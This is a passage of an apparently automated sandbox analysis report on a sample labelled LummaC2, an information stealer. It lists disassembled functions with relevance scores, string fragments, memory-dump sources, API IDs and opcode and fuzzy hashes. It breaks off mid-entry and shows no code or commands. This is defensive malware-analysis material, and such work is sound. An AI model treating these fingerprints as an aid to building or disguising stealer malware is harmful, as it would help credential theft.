                                              • Instruction Fuzzy Hash: 75D116B2A087158FD718DF29DC5177AB7D2ABC4310F4A863CE9969B381EB74DC058782
                                              Function 00E215EE Relevance: 2.8, Strings: 2, Instructions: 334COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 3P$FN
                                              • API String ID: 0-3819786433
                                              • Opcode ID: 4344248c456039b5fc4d5f2ad469279c2821337d3bd4fcd642226cbede9280cc
                                              • Instruction ID: 075f0edc0eacc3b432956632f903194f7d1f845f3846eacc87346f38324ba469
                                              • Opcode Fuzzy Hash: 4344248c456039b5fc4d5f2ad469279c2821337d3bd4fcd642226cbede9280cc
                                              • Instruction Fuzzy Hash: B191E57050C3D18BD3298B3994503EBBFE1AFE6308F189A9DD4C9A7282D7758606CB56
                                              Function 00E21607 Relevance: 2.8, Strings: 2, Instructions: 328COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 3P$FN
                                              • API String ID: 0-3819786433
                                              • Opcode ID: e9ccd72ae58924d6e0e7115a04bacfbe23370597922eec27f717841a2296b211
                                              • Instruction ID: 9271600ce291762013457502bb32dab5f009a99df1c19e671ef76a48f9f79794
                                              • Opcode Fuzzy Hash: e9ccd72ae58924d6e0e7115a04bacfbe23370597922eec27f717841a2296b211
                                              • Instruction Fuzzy Hash: FE91057050C3D18BD3298F3994503EBBFE1AFE6308F189A9DD4C9A7282D7758606CB56
                                              Function 00E18B70 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4ijk$l1~3
                                              • API String ID: 0-2045880676
                                              • Opcode ID: f9a3fb7a4dd4de540f83080ccae53739c4184bb4dcef3c309818d822e973897a
                                              • Instruction ID: 304f008eefbf76b90eaf7ee108074e07110a079f7d8d4ac5264bbdad22aa2d69
                                              • Opcode Fuzzy Hash: f9a3fb7a4dd4de540f83080ccae53739c4184bb4dcef3c309818d822e973897a
                                              • Instruction Fuzzy Hash: C581E0B01183008BE714CF24C8557ABBBE1EFD1358F08992DF5C59B281EB79C949CB56
                                              Function 00E19C10 Relevance: 2.8, Strings: 2, Instructions: 251COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PQ$yz{
                                              • API String ID: 0-3852431821
                                              • Opcode ID: 8f0e22da3b45c66ced7ce6c0aa0b4289ff0481cd585999bfe09622a77fdaa648
                                              • Instruction ID: d06bc1ba812d0c580ebe629e8ccc747902b678f2a8fa29c74807753fcea499c5
                                              • Opcode Fuzzy Hash: 8f0e22da3b45c66ced7ce6c0aa0b4289ff0481cd585999bfe09622a77fdaa648
                                              • Instruction Fuzzy Hash: 1A81EDB15093408BD7208F19E8417ABBBE1FFC2368F185A2CE5D96B351E7798505CB93
                                              Function 00E06100 Relevance: 2.7, Strings: 2, Instructions: 246COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: gfff$gfff
                                              • API String ID: 0-3084402119
                                              • Opcode ID: 5024123e425171fc9af67a0283b3c3ad969dc3ed8bb154d66441bf7189e69ac2
                                              • Instruction ID: 7abb5575e58e9ba71ec1bc2ce6ebc616d1d945cf55becf6c8a7bfe101a67233b
                                              • Opcode Fuzzy Hash: 5024123e425171fc9af67a0283b3c3ad969dc3ed8bb154d66441bf7189e69ac2
                                              • Instruction Fuzzy Hash: 0471C1727206018FD71C8B2ACC6676676D3ABD4328F1DC26DD016DB3E5EB79E8468B40
                                              Function 00E187F7 Relevance: 2.7, Strings: 2, Instructions: 217COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: +=Hz$S=Hz
                                              • API String ID: 0-1812093345
                                              • Opcode ID: f49dd5f970a8a68168d046de354e1d30f6f0ebfd7ba31c58a872c1363bb9af9d
                                              • Instruction ID: 35205cdd79309e9542f75f6ed9ed8dad401edd555fc6751bcbd170c00663c8b6
                                              • Opcode Fuzzy Hash: f49dd5f970a8a68168d046de354e1d30f6f0ebfd7ba31c58a872c1363bb9af9d
                                              • Instruction Fuzzy Hash: 26617A32A483418BD738CA24C9613FBB7D1DF90310F989A2DCADA673C1DB349549D782
                                              Function 00E1CB91 Relevance: 2.7, Strings: 2, Instructions: 202COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HG$u
                                              • API String ID: 0-3686158494
                                              • Opcode ID: f915f0dd6a18c20bfe5ba49134b2524b1f56a12a7db7fd6f7cc062178beff2b1
                                              • Instruction ID: 6adefc1e1a1be339e804532fc6abde445d88c94a9771f58d5451153eb69783c2
                                              • Opcode Fuzzy Hash: f915f0dd6a18c20bfe5ba49134b2524b1f56a12a7db7fd6f7cc062178beff2b1
                                              • Instruction Fuzzy Hash: 157145716083408FC318DF29C8907AABBE2AFC5314F59CA6CF5D69B2E1D7349944CB52
                                              Function 00E054C0 Relevance: 2.2, Strings: 1, Instructions: 930COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: NP,?
                                              • API String ID: 0-3110377521
                                              • Opcode ID: c7379d1ae1bf1e66a5ea2acabea78b35cca8c6e595ed94c31a44adf2b2dfb720
                                              • Instruction ID: f0869b37610a56a014c20fa410783b5e3bd4a407a85ff4de9b90848e4ce5f10d
                                              • Opcode Fuzzy Hash: c7379d1ae1bf1e66a5ea2acabea78b35cca8c6e595ed94c31a44adf2b2dfb720
                                              • Instruction Fuzzy Hash: 6A424172608204DFD7149F29DC5A73B77E1EF85328F58562CF882AB2E1E7749848CB91
                                              Function 00E2ECD9 Relevance: 2.1, Strings: 1, Instructions: 818COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ..
                                              • API String ID: 0-870355071
                                              • Opcode ID: e7dc4851570d38a63dbf8571da1df6f29332732a897cf7892ec9a5d41367aec1
                                              • Instruction ID: 65f1cc016acc1e42eabfabe4be295b292b922ae9e252d214dbf7f7de32a10adb
                                              • Opcode Fuzzy Hash: e7dc4851570d38a63dbf8571da1df6f29332732a897cf7892ec9a5d41367aec1
                                              • Instruction Fuzzy Hash: EC421D36618322CBD7088F28E85536BB7E2EF85310F09D97DE49697290E778D949C782
                                              Function 00E21DE0 Relevance: 2.1, Strings: 1, Instructions: 807COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: i7
                                              • API String ID: 0-1271908578
                                              • Opcode ID: 1d092e72ec8373ba7c8767957e71b503b5b0495f908c172287ccf6c296b63c3d
                                              • Instruction ID: 15edbe013d57114da3ed1ee12d1c394de63bdcd42ee6453c5d6941dc05672f97
                                              • Opcode Fuzzy Hash: 1d092e72ec8373ba7c8767957e71b503b5b0495f908c172287ccf6c296b63c3d
                                              • Instruction Fuzzy Hash: 9A82E1B0614B809FD3A1CF3D8846793BFE8AB5A304F18495EE0EED7342D775A5048B66
                                              Function 00E1BC9A Relevance: 1.9, Strings: 1, Instructions: 694COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Ix
                                              • API String ID: 0-2137776124
                                              • Opcode ID: 32caea645dfd65487985fcb16cece808c5214e26833445aa8adfa1b0f66c7d91
                                              • Instruction ID: 9f917ef332da89ae3c90fe66b99d357b3fbe9fdf53f9c0f90a1de083672bfb6c
                                              • Opcode Fuzzy Hash: 32caea645dfd65487985fcb16cece808c5214e26833445aa8adfa1b0f66c7d91
                                              • Instruction Fuzzy Hash: C922DDB4608304CFD724DF65D8917ABB7F1EF85314F08982CE5969B3A1EB389944CB52
                                              Function 00E1BD9A Relevance: 1.9, Strings: 1, Instructions: 692COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Ix
                                              • API String ID: 0-2137776124
                                              • Opcode ID: 707ae9ea2071e1769d26a3f2d52d11a06ffeb1cbeff7639397d350578e17b1fd
                                              • Instruction ID: 4af38c41fbbfd2763191f3a39e4148ebfa25642d03c69a78194b1d97b8302d64
                                              • Opcode Fuzzy Hash: 707ae9ea2071e1769d26a3f2d52d11a06ffeb1cbeff7639397d350578e17b1fd
                                              • Instruction Fuzzy Hash: 2C22DDB4608304CFD724DF25D8917ABB7F1EF85314F08982CE5969B3A1E7389944CB52
                                              Function 00E33EA0 Relevance: 1.7, Strings: 1, Instructions: 491COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 2?
                                              • API String ID: 0-3250069207
                                              • Opcode ID: f2fc119536e03ccf7257c5a3d98e7f1d09557b7fa6a90078ec86f19c45c4fbea
                                              • Instruction ID: 6b12368d1cdc944e0acdd6e617ede77d3153693ba85a1959e1bbda500df4c7a2
                                              • Opcode Fuzzy Hash: f2fc119536e03ccf7257c5a3d98e7f1d09557b7fa6a90078ec86f19c45c4fbea
                                              • Instruction Fuzzy Hash: 93E10176609314CFC308CF29E8946AABBE2FBC8315F09897CE485A7391D774D949CB81
                                              Function 00E10CB1 Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: A
                                              • API String ID: 0-3554254475
                                              • Opcode ID: f6b30f6269008b77b7207d85f67aaa309a76c3beddef89373f46131e65963537
                                              • Instruction ID: a639c16671f66a68976e7ef97fbb4937179e88dd09cbbe4f1a66ba6e946735d5
                                              • Opcode Fuzzy Hash: f6b30f6269008b77b7207d85f67aaa309a76c3beddef89373f46131e65963537
                                              • Instruction Fuzzy Hash: FA126921108BC28ED726CA3C8848356BF916B67224F1CC7DCE4F98F7D7C366915687A2
                                              Function 00E17250 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00E16FA9
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID:
                                              • API String ID: 237503144-0
                                              • Opcode ID: dcf63949d987969e29d35a133ce4bd5e319d288bf9b8aa9168b7bbe6cdb4d885
                                              • Instruction ID: b7931ee18394cb17cfbd9ece5687e2042e77bedff8dccccef60f739afe6b3c03
                                              • Opcode Fuzzy Hash: dcf63949d987969e29d35a133ce4bd5e319d288bf9b8aa9168b7bbe6cdb4d885
                                              • Instruction Fuzzy Hash: B941E571608314DFE314CF69A85176FBBE5EB89314F00493DFAA5AB280D7B198448B92
                                              Function 00E2E5F0 Relevance: 1.6, Strings: 1, Instructions: 387COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: NP,?
                                              • API String ID: 0-3110377521
                                              • Opcode ID: 6601ede502d54238f840a90ea2d587fe29b0f1a961b6a15b6c8ceaca293f6863
                                              • Instruction ID: 439df62e22fbcd5a9ea737dcace4af1f1656a8ae1534d1448e548f2c3e7bc0ac
                                              • Opcode Fuzzy Hash: 6601ede502d54238f840a90ea2d587fe29b0f1a961b6a15b6c8ceaca293f6863
                                              • Instruction Fuzzy Hash: 7CA135716043349FD324CE15EC84B6BB7A2EBC5328F199A19E5A9373D5E730AC06CB91
                                              Function 00E35150 Relevance: 1.6, Strings: 1, Instructions: 305COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: cjkh
                                              • API String ID: 2994545307-2297926145
                                              • Opcode ID: 69ddfb752d17ef2ad81c530a9d527ff0e09de6823c5b5df8eb5cd8108cbb30ff
                                              • Instruction ID: e471e3dd09146590b8a15a5bc307cf8336273e7f5222c66f80804c218624c2f6
                                              • Opcode Fuzzy Hash: 69ddfb752d17ef2ad81c530a9d527ff0e09de6823c5b5df8eb5cd8108cbb30ff
                                              • Instruction Fuzzy Hash: 7C9145327087004BC318DE29D88976BBBA3EBC5318F1DD62CE4AA6B395D736D809C741
                                              Function 00E34860 Relevance: 1.6, Strings: 1, Instructions: 303COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-3019521637
                                              • Opcode ID: 8df207875994872d3301c45ce0cb527f492ffd78e0873487af989aafc21a5af3
                                              • Instruction ID: 640f58f403af3b77f406b4e1cd65749396f531357d9f5f81cf4d49726d28489a
                                              • Opcode Fuzzy Hash: 8df207875994872d3301c45ce0cb527f492ffd78e0873487af989aafc21a5af3
                                              • Instruction Fuzzy Hash: 2AA114719082118BD718DF29C85476BFBE2EFD9318F15952CE8D6AB2D1DB30E805CB86
                                              Function 00E0C4B6 Relevance: 1.5, Strings: 1, Instructions: 292COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @A
                                              • API String ID: 0-2960862460
                                              • Opcode ID: 74298225279fc21360fb75a5417d80ab871dc61a06c2bcf91aa03524930e53d1
                                              • Instruction ID: 1ba3cf5e0d4ed0f08eba2d9c211983879f29b55e9fce63f4ff3e0047feb1fd65
                                              • Opcode Fuzzy Hash: 74298225279fc21360fb75a5417d80ab871dc61a06c2bcf91aa03524930e53d1
                                              • Instruction Fuzzy Hash: B68137725083508BC324CF24C891767BBF0EF95318F29662DE8D6AB3A1E7799C45C792
                                              Function 00E0DAF0 Relevance: 1.5, Strings: 1, Instructions: 291COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
